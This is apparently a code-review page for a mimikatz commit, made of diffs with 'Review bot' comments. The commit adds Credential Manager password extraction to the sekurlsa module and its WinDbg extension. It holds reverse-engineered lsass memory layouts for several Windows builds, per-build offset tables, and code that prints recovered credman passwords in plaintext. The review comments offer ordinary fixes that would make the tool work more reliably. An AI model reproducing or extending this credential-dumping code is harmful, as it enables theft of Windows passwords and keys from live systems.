void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN ULONG_PTR pl_LogSessList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN ULONG_PTR pSspCredentialList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMasterKeyCacheList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN ULONG_PTR reserved, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
|
||||
typedef struct _MSV1_0_PRIMARY_CREDENTIAL {
|
||||
LSA_UNICODE_STRING LogonDomainName;
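Review bot: The seven rewritten prototypes and the new `kuhl_m_sekurlsa_enum_logon_callback_credman` declaration carry no comment on what the shared `PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData` parameter supplies, nor on the meaning of the first `ULONG_PTR` argument (a list or table address for most callbacks, `reserved` for msv and credman). A short block comment above the group — naming the fields the implementations on this page actually read (`LogonId`, `pCredentials`, `pCredentialManager`), stating that `pData` must be non-NULL, and noting that each callback reads the target through `ReadMemory` and reports a failed lookup with `dprintf("KO")` — would let a reader of the header understand the contract without opening the .c file. Whether `pData` may ever be NULL is not established by anything visible here, so the comment should state it as the requirement rather than as observed behaviour.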
|
||||
@ -92,7 +93,7 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION
|
||||
FILETIME unk25;
|
||||
LIST_ENTRY Tickets_3;
|
||||
FILETIME unk26;
|
||||
PUNICODE_STRING pinCode; // not only PIN (CSP Info)
|
||||
PUNICODE_STRING pinCode; // not only PIN (CSP Info)
|
||||
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
|
||||
|
||||
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL
|
||||
@ -170,3 +171,76 @@ typedef struct _KIWI_MASTERKEY_CACHE_ENTRY {
|
||||
ULONG keySize;
|
||||
BYTE key[ANYSIZE_ARRAY];
|
||||
} KIWI_MASTERKEY_CACHE_ENTRY, *PKIWI_MASTERKEY_CACHE_ENTRY;
|
||||
|
||||
typedef struct _CREDMAN_INFOS {
|
||||
ULONG structSize;
|
||||
ULONG offsetFLink;
|
||||
ULONG offsetUsername;
|
||||
ULONG offsetDomain;
|
||||
ULONG offsetCbPassword;
|
||||
ULONG offsetPassword;
|
||||
} CREDMAN_INFOS, *PCREDMAN_INFOS;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_LIST_ENTRY_60 {
|
||||
ULONG cbEncPassword;
|
||||
PWSTR encPassword;
|
||||
ULONG unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
PVOID unk3;
|
||||
PWSTR UserName;
|
||||
ULONG cbUserName;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Flink;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Blink;
|
||||
UNICODE_STRING type;
|
||||
PVOID unk5;
|
||||
UNICODE_STRING server1;
|
||||
PVOID unk6;
|
||||
PVOID unk7;
|
||||
PVOID unk8;
|
||||
PVOID unk9;
|
||||
PVOID unk10;
|
||||
UNICODE_STRING user;
|
||||
ULONG unk11;
|
||||
UNICODE_STRING server2;
|
||||
} KIWI_CREDMAN_LIST_ENTRY_60, *PKIWI_CREDMAN_LIST_ENTRY_60;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_LIST_ENTRY {
|
||||
ULONG cbEncPassword;
|
||||
PWSTR encPassword;
|
||||
ULONG unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
PVOID unk3;
|
||||
PWSTR UserName;
|
||||
ULONG cbUserName;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Flink;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Blink;
|
||||
LIST_ENTRY unk4;
|
||||
UNICODE_STRING type;
|
||||
PVOID unk5;
|
||||
UNICODE_STRING server1;
|
||||
PVOID unk6;
|
||||
PVOID unk7;
|
||||
PVOID unk8;
|
||||
PVOID unk9;
|
||||
PVOID unk10;
|
||||
UNICODE_STRING user;
|
||||
ULONG unk11;
|
||||
UNICODE_STRING server2;
|
||||
} KIWI_CREDMAN_LIST_ENTRY, *PKIWI_CREDMAN_LIST_ENTRY;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_LIST_STARTER {
|
||||
ULONG unk0;
|
||||
PKIWI_CREDMAN_LIST_ENTRY start;
|
||||
//...
|
||||
} KIWI_CREDMAN_LIST_STARTER, *PKIWI_CREDMAN_LIST_STARTER;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_SET_LIST_ENTRY {
|
||||
struct _KIWI_CREDMAN_SET_LIST_ENTRY *Flink;
|
||||
struct _KIWI_CREDMAN_SET_LIST_ENTRY *Blink;
|
||||
ULONG unk0;
|
||||
PKIWI_CREDMAN_LIST_STARTER list1;
|
||||
PKIWI_CREDMAN_LIST_STARTER list2;
|
||||
// ...
|
||||
} KIWI_CREDMAN_SET_LIST_ENTRY, *PKIWI_CREDMAN_SET_LIST_ENTRY;
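Review bot: In `KIWI_CREDMAN_LIST_ENTRY_60` the list links are declared as `struct _KIWI_CREDMAN_LIST_ENTRY *Flink;` / `*Blink;`, i.e. they point at the non-60 layout rather than at `struct _KIWI_CREDMAN_LIST_ENTRY_60`, so walking the list through these members would type the neighbours as the wrong structure. If both layouts are meant to be walked only through the generic `CREDMAN_INFOS` offsets, a comment on the struct saying so would stop the mismatch being "fixed" into a real bug later; otherwise `struct _KIWI_CREDMAN_LIST_ENTRY_60 *Flink;` keeps the type self-consistent. These four layouts are recovered lsass internals with no documentation: a one-line comment per struct naming the Windows build range it applies to (the `KULL_M_WIN_MIN_BUILD_*` constants introduced elsewhere in this commit) would let a reader tell which one a given `NtBuildNumber` selects.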
|
@ -180,4 +180,4 @@ BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid)
|
||||
status = ReadMemory(buffer, *pSid, sizeSid, NULL);
|
||||
}
|
||||
return status;
|
||||
}
|
||||
}
|
@ -52,7 +52,7 @@ typedef struct _KIWI_MSV1_0_CREDENTIALS {
|
||||
PKIWI_MSV1_0_PRIMARY_CREDENTIALS PrimaryCredentials;
|
||||
} KIWI_MSV1_0_CREDENTIALS, *PKIWI_MSV1_0_CREDENTIALS;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_6 {
|
||||
typedef struct _KIWI_MSV1_0_LIST_60 {
|
||||
struct _KIWI_MSV1_0_LIST_6 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_6 *Blink;
|
||||
PVOID unk0;
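Review bot: The struct tag is renamed to `_KIWI_MSV1_0_LIST_60` but its own links still read `struct _KIWI_MSV1_0_LIST_6 *Flink;` / `struct _KIWI_MSV1_0_LIST_6 *Blink;`, and the new `_KIWI_MSV1_0_LIST_61` in the following hunk repeats the same `struct _KIWI_MSV1_0_LIST_6` pointers. As far as the hunks shown go, no definition of `_KIWI_MSV1_0_LIST_6` remains after this change, so those members point to an incomplete type: any `->Flink->Field` access would fail to compile, and the declaration no longer documents which layout the list carries. Suggest `struct _KIWI_MSV1_0_LIST_60 *Flink; struct _KIWI_MSV1_0_LIST_60 *Blink;` here and the `_61` equivalents in the next hunk.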
|
||||
@ -81,7 +81,49 @@ typedef struct _KIWI_MSV1_0_LIST_6 {
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
} KIWI_MSV1_0_LIST_6, *PKIWI_MSV1_0_LIST_6;
|
||||
ULONG unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
PVOID unk22;
|
||||
ULONG unk23;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_60, *PKIWI_MSV1_0_LIST_60;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_61 {
|
||||
struct _KIWI_MSV1_0_LIST_6 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_6 *Blink;
|
||||
PVOID unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
ULONG unk3;
|
||||
ULONG unk4;
|
||||
ULONG unk5;
|
||||
HANDLE hSemaphore6;
|
||||
PVOID unk7;
|
||||
HANDLE hSemaphore8;
|
||||
PVOID unk9;
|
||||
PVOID unk10;
|
||||
ULONG unk11;
|
||||
ULONG unk12;
|
||||
PVOID unk13;
|
||||
LUID LocallyUniqueIdentifier;
|
||||
LUID SecondaryLocallyUniqueIdentifier;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk14;
|
||||
PVOID unk15;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
ULONG Session;
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_61, *PKIWI_MSV1_0_LIST_61;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_62 {
|
||||
struct _KIWI_MSV1_0_LIST_62 *Flink;
|
||||
@ -106,8 +148,7 @@ typedef struct _KIWI_MSV1_0_LIST_62 {
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk14;
|
||||
PVOID unk15;
|
||||
/*PVOID unk16;
|
||||
PVOID unk17;*/LSA_UNICODE_STRING Type;
|
||||
LSA_UNICODE_STRING Type;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
PVOID unk18;
|
||||
@ -115,6 +156,18 @@ typedef struct _KIWI_MSV1_0_LIST_62 {
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
ULONG unk23;
|
||||
ULONG unk24;
|
||||
ULONG unk25;
|
||||
ULONG unk26;
|
||||
PVOID unk27;
|
||||
PVOID unk28;
|
||||
PVOID unk29;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_62, *PKIWI_MSV1_0_LIST_62;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_63 {
|
||||
@ -141,8 +194,7 @@ typedef struct _KIWI_MSV1_0_LIST_63 {
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk14;
|
||||
PVOID unk15;
|
||||
/*PVOID unk16;
|
||||
PVOID unk17;*/LSA_UNICODE_STRING Type;
|
||||
LSA_UNICODE_STRING Type;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
PVOID unk18;
|
||||
@ -150,8 +202,31 @@ typedef struct _KIWI_MSV1_0_LIST_63 {
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
ULONG unk23;
|
||||
ULONG unk24;
|
||||
ULONG unk25;
|
||||
ULONG unk26;
|
||||
PVOID unk27;
|
||||
PVOID unk28;
|
||||
PVOID unk29;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_63, *PKIWI_MSV1_0_LIST_63;
|
||||
|
||||
typedef struct _KIWI_BASIC_SECURITY_LOGON_SESSION_DATA {
|
||||
PLUID LogonId;
|
||||
PLSA_UNICODE_STRING UserName;
|
||||
PLSA_UNICODE_STRING LogonDomain;
|
||||
ULONG LogonType;
|
||||
ULONG Session;
|
||||
PVOID pCredentials;
|
||||
PSID pSid;
|
||||
PVOID pCredentialManager;
|
||||
} KIWI_BASIC_SECURITY_LOGON_SESSION_DATA, *PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA;
|
||||
|
||||
#define RtlEqualLuid(L1, L2) (((L1)->LowPart == (L2)->LowPart) && ((L1)->HighPart == (L2)->HighPart))
|
||||
extern BOOLEAN WINAPI RtlEqualString(IN const STRING *String1, IN const STRING *String2, IN BOOLEAN CaseInSensitive);
|
||||
extern VOID WINAPI RtlFreeUnicodeString(IN PUNICODE_STRING UnicodeString);
|
||||
@ -170,6 +245,6 @@ void kull_m_string_dprintf_hex(LPCVOID lpData, DWORD cbData, DWORD flags);
|
||||
void kull_m_string_displayFileTime(IN PFILETIME pFileTime);
|
||||
void kull_m_string_displayLocalFileTime(IN PFILETIME pFileTime);
|
||||
void kull_m_string_displayGUID(IN LPCGUID pGuid);
|
||||
void kull_m_string_displaySID(IN PSID pSid)
|
||||
void kull_m_string_displaySID(IN PSID pSid);
|
||||
BOOL kull_m_string_suspectUnicodeString(IN PUNICODE_STRING pUnicodeString);
|
||||
BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid);
|
||||
BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid);
|
@ -69,12 +69,14 @@ KUHL_M_SEKURLSA_PACKAGE packages[] = {
|
||||
{"ssp", "msv1_0!SspCredentialList", 0, kuhl_m_sekurlsa_enum_logon_callback_ssp},
|
||||
{"masterkey", "lsasrv!g_MasterKeyCacheList", 0, kuhl_m_sekurlsa_enum_logon_callback_masterkeys},
|
||||
{"masterkey", "dpapisrv!g_MasterKeyCacheList", 0, kuhl_m_sekurlsa_enum_logon_callback_masterkeys},
|
||||
{"credman", NULL, 0, kuhl_m_sekurlsa_enum_logon_callback_credman},
|
||||
};
|
||||
|
||||
const KUHL_M_SEKURLSA_ENUM_HELPER lsassEnumHelpers[] = {
|
||||
{sizeof(KIWI_MSV1_0_LIST_6) , FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_6, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , pSid)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_62), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, pSid)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid)}
|
||||
{sizeof(KIWI_MSV1_0_LIST_60), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_61), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_62), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, CredentialManager)},
|
||||
};
|
||||
|
||||
DECLARE_API(mimikatz)
|
||||
@ -85,14 +87,15 @@ DECLARE_API(mimikatz)
|
||||
KIWI_BASIC_SECURITY_LOGON_SESSION_DATA sessionData;
|
||||
const KUHL_M_SEKURLSA_ENUM_HELPER * helper;
|
||||
PBYTE buffer;
|
||||
char * sidStr;
|
||||
|
||||
if(NtBuildNumber < 8000)
|
||||
if(NtBuildNumber < KULL_M_WIN_MIN_BUILD_7)
|
||||
helper = &lsassEnumHelpers[0];
|
||||
else if(NtBuildNumber < 9400)
|
||||
else if(NtBuildNumber < KULL_M_WIN_MIN_BUILD_8)
|
||||
helper = &lsassEnumHelpers[1];
|
||||
else
|
||||
else if(NtBuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)
|
||||
helper = &lsassEnumHelpers[2];
|
||||
else
|
||||
helper = &lsassEnumHelpers[3];
|
||||
|
||||
pInitializationVector = GetExpression("lsasrv!InitializationVector");
|
||||
phAesKey = GetExpression("lsasrv!hAesKey");
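Review bot: The four `if`/`else if` branches on `NtBuildNumber` select `lsassEnumHelpers[0]`..`[3]` by bare index, so they are only correct while the table in the earlier hunk keeps exactly four rows in the order 60, 61, 62, 63; nothing ties the two together. A comment on the table (`/* order matters: indexed by the NtBuildNumber ladder in DECLARE_API(mimikatz) */`) plus a compile-time check such as `C_ASSERT(ARRAYSIZE(lsassEnumHelpers) == 4);` would catch a reorder or an added row, or the helper struct could carry its minimum build number and be searched instead of indexed. `DECLARE_API(mimikatz)` begins before this hunk and continues after it.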
|
||||
@ -135,6 +138,7 @@ DECLARE_API(mimikatz)
|
||||
sessionData.LogonDomain = (PUNICODE_STRING) (buffer + helper->offsetToDomain);
|
||||
sessionData.pCredentials= *(PVOID *) (buffer + helper->offsetToCredentials);
|
||||
sessionData.pSid = *(PSID *) (buffer + helper->offsetToPSid);
|
||||
sessionData.pCredentialManager = *(PVOID *) (buffer + helper->offsetToCredentialManager);
|
||||
|
||||
if((sessionData.LogonType != Network) /*&& (sessionData.LogonType != UndefinedLogonType)*/)
|
||||
{
|
||||
@ -151,9 +155,7 @@ DECLARE_API(mimikatz)
|
||||
, sessionData.UserName, sessionData.LogonDomain);
|
||||
|
||||
if(sessionData.pSid)
|
||||
{
|
||||
kull_m_string_displaySID(sessionData.pSid);
|
||||
}
|
||||
dprintf("\n");
|
||||
|
||||
LocalFree(sessionData.UserName->Buffer);
|
||||
@ -164,7 +166,7 @@ DECLARE_API(mimikatz)
|
||||
if(packages[j].symbolPtr || !packages[j].symbolName)
|
||||
{
|
||||
dprintf("\t%s : ", packages[j].name);
|
||||
packages[j].callback(packages[j].symbolPtr, sessionData.LogonId, sessionData.pCredentials);
|
||||
packages[j].callback(packages[j].symbolPtr, &sessionData);
|
||||
dprintf("\n");
|
||||
}
|
||||
}
|
||||
@ -280,9 +282,13 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
||||
, username ? username : &uNull, domain ? domain : &uNull);
|
||||
|
||||
if(!password || kull_m_string_suspectUnicodeString(password))
|
||||
dprintf("%wZ", password ? password : &uNull);
|
||||
else
|
||||
kull_m_string_dprintf_hex(password->Buffer, password->Length, 1);
|
||||
{
|
||||
if((flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS) && password)
|
||||
dprintf("%.*S", password->Length / sizeof(wchar_t), password->Buffer);
|
||||
else
|
||||
dprintf("%wZ", password ? password : &uNull);
|
||||
}
|
||||
else kull_m_string_dprintf_hex(password->Buffer, password->Length, 1);
|
||||
}
|
||||
|
||||
LocalFree(mesCreds->UserName.Buffer);
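Review bot: In the new `dprintf("%.*S", password->Length / sizeof(wchar_t), password->Buffer);` the `*` precision argument must be an `int`, but `password->Length / sizeof(wchar_t)` is promoted to `size_t`, so a 64-bit value is passed where the format reads a 32-bit `int` — a format/argument mismatch that is undefined behaviour and only works on x64 in practice because the low half of the slot is read. Cast it explicitly: `dprintf("%.*S", (int)(password->Length / sizeof(wchar_t)), password->Buffer);`. A short comment above the inner `if` explaining why the `KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS` case is printed with an explicit length instead of `%wZ` would also help, since the reason is not evident from the hunk. `kuhl_m_sekurlsa_genericCredsOutput` starts before and ends after this hunk.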
|
||||
@ -320,4 +326,4 @@ VOID kuhl_m_sekurlsa_genericKeyOutput(PMARSHALL_KEY key, PVOID * dirtyBase)
|
||||
}
|
||||
kull_m_string_dprintf_hex((PBYTE) *dirtyBase + sizeof(ULONG), key->length, 0);
|
||||
*dirtyBase = (PBYTE) *dirtyBase + sizeof(ULONG) + *(PULONG) *dirtyBase;
|
||||
}
|
||||
}
|
@ -19,6 +19,7 @@ USHORT NtBuildNumber;
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK 0x07000000
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS 0x00400000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE 0x00800000
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT 0x10000000
|
||||
@ -26,7 +27,7 @@ USHORT NtBuildNumber;
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN 0x40000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_SSP 0x80000000
|
||||
|
||||
typedef void (CALLBACK * PKUHL_M_SEKURLSA_PACKAGE_CALLBACK) (IN ULONG_PTR pKerbGlobalLogonSessionTable, IN PLUID logId, IN PVOID pCredentials);
|
||||
typedef void (CALLBACK * PKUHL_M_SEKURLSA_PACKAGE_CALLBACK) (IN ULONG_PTR pKerbGlobalLogonSessionTable, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
|
||||
typedef struct _KUHL_M_SEKURLSA_PACKAGE {
|
||||
const char * name;
|
||||
@ -37,25 +38,16 @@ typedef struct _KUHL_M_SEKURLSA_PACKAGE {
|
||||
|
||||
typedef struct _KUHL_M_SEKURLSA_ENUM_HELPER {
|
||||
ULONG tailleStruct;
|
||||
LONG offsetToLuid;
|
||||
LONG offsetToLogonType;
|
||||
LONG offsetToSession;
|
||||
LONG offsetToUsername;
|
||||
LONG offsetToDomain;
|
||||
LONG offsetToCredentials;
|
||||
LONG offsetToPSid;
|
||||
ULONG offsetToLuid;
|
||||
ULONG offsetToLogonType;
|
||||
ULONG offsetToSession;
|
||||
ULONG offsetToUsername;
|
||||
ULONG offsetToDomain;
|
||||
ULONG offsetToCredentials;
|
||||
ULONG offsetToPSid;
|
||||
ULONG offsetToCredentialManager;
|
||||
} KUHL_M_SEKURLSA_ENUM_HELPER, *PKUHL_M_SEKURLSA_ENUM_HELPER;
|
||||
|
||||
typedef struct _KIWI_BASIC_SECURITY_LOGON_SESSION_DATA {
|
||||
PLUID LogonId;
|
||||
PLSA_UNICODE_STRING UserName;
|
||||
PLSA_UNICODE_STRING LogonDomain;
|
||||
ULONG LogonType;
|
||||
ULONG Session;
|
||||
PVOID pCredentials;
|
||||
PSID pSid;
|
||||
} KIWI_BASIC_SECURITY_LOGON_SESSION_DATA, *PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA;
|
||||
|
||||
LPEXT_API_VERSION WDBGAPI ExtensionApiVersion (void);
|
||||
VOID CheckVersion(void);
|
||||
VOID WDBGAPI WinDbgExtensionDllInit (PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion);
|
||||
@ -63,3 +55,17 @@ DECLARE_API(mimikatz);
|
||||
|
||||
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags);
|
||||
VOID kuhl_m_sekurlsa_genericKeyOutput(struct _MARSHALL_KEY * key, PVOID * dirtyBase);
|
||||
|
||||
#define KULL_M_WIN_BUILD_XP 2600
|
||||
#define KULL_M_WIN_BUILD_2K3 3790
|
||||
#define KULL_M_WIN_BUILD_VISTA 6000
|
||||
#define KULL_M_WIN_BUILD_7 7600
|
||||
#define KULL_M_WIN_BUILD_8 9200
|
||||
#define KULL_M_WIN_BUILD_BLUE 9600
|
||||
|
||||
#define KULL_M_WIN_MIN_BUILD_XP 2500
|
||||
#define KULL_M_WIN_MIN_BUILD_2K3 3000
|
||||
#define KULL_M_WIN_MIN_BUILD_VISTA 6000
|
||||
#define KULL_M_WIN_MIN_BUILD_7 7000
|
||||
#define KULL_M_WIN_MIN_BUILD_8 8000
|
||||
#define KULL_M_WIN_MIN_BUILD_BLUE 9400
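Review bot: The two constant families added here carry no comment distinguishing them, although `KULL_M_WIN_BUILD_8` (9200) and `KULL_M_WIN_MIN_BUILD_8` (8000) differ considerably and only the `MIN_` values are used as thresholds in `DECLARE_API(mimikatz)`. Suggest a comment above each group, e.g. `/* build numbers of the released versions */` over the first and `/* thresholds: a build number >= this value is treated as this version or later */` over the second, so the next person adding a version knows which family a new value belongs to and that the `MIN_` constants must stay strictly ordered.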
|
@ -606,6 +606,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\globals_sekurlsa.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\kuhl_m_sekurlsa.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\kuhl_m_sekurlsa_utils.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_credman.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_dpapi.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_kerberos.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_livessp.h" />
|
||||
@ -657,6 +658,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt63.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\kuhl_m_sekurlsa.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\kuhl_m_sekurlsa_utils.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_credman.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_dpapi.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_kerberos.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_livessp.c" />
|
||||
|
@ -158,6 +158,9 @@
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_misc_struct.h">
|
||||
<Filter>modules</Filter>
|
||||
</ClInclude>
|
||||
